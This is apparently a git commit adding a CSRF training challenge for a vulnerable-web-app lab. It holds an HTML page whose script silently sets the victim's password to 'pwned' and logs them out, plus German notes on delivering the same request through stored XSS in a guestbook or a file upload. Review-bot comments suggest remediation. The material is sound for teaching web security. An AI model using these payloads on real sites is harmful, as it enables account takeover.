Commit 2f145781 authored by David

added csrf challenge

parent 64cd330d
<html>
<body>
<h1>Your account has been hacked!</h1>
<p>Well, maybe we will give it back to you :-)</p>
<script>
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "http://[IP]/vulnerabilities/csrf/?password_new=pwned&password_conf=pwned&Change=Change", true);
xhttp.send();
var xhttp_logout = new XMLHttpRequest();
xhttp_logout.open("GET", "http://[IP]/logout.php");
xhttp_logout.send();
</script>
</body>
\ No newline at end of file
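Review bot: The document is never closed: after `</body>` there is no `</html>`, and the file ends without a trailing newline; add both. The `[IP]` placeholder in the two `xhttp.open(...)` calls is not explained anywhere in the file, so an HTML comment at the top stating that it stands for the lab host would make the required adjustment obvious to participants. Because this is challenge material, the file or its accompanying notes should also record the finding the exercise is built on: the password change is accepted as a GET carrying only `password_new`, `password_conf` and `Change`, so the expected remediation is a per-session anti-CSRF token and the current password, submitted via POST.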
# Normal
# Hack 1
Dies kann ins Gästebuch (Stored XSS) eingefügt werden:
```
<script>
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "http://[IP]/vulnerabilities/csrf/?password_new=pwned&password_conf=pwned&Change=Change", true);
xhttp.send();
</script>
```
# Hack 2
Die Datei CSRF.html kann nach der notwendigen Anpassung im File-Upload hochgeladen werden.
\ No newline at end of file
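Review bot: `# Normal` is an empty heading followed directly by `# Hack 1`; either describe the intended normal password-change flow there or drop the heading. Under `# Hack 2`, "nach der notwendigen Anpassung" does not say what has to be adjusted; name the `[IP]` placeholder explicitly. The snippet under `# Hack 1` repeats the first request from the HTML file added in this commit, so the two copies can drift apart; consider referring to the file instead of duplicating the code. The code fence has no language tag and the file ends without a trailing newline. A closing section with the solution from the defender's side (output encoding for guestbook entries, restricting uploadable file types, and an anti-CSRF token on the password form) would complete the challenge write-up.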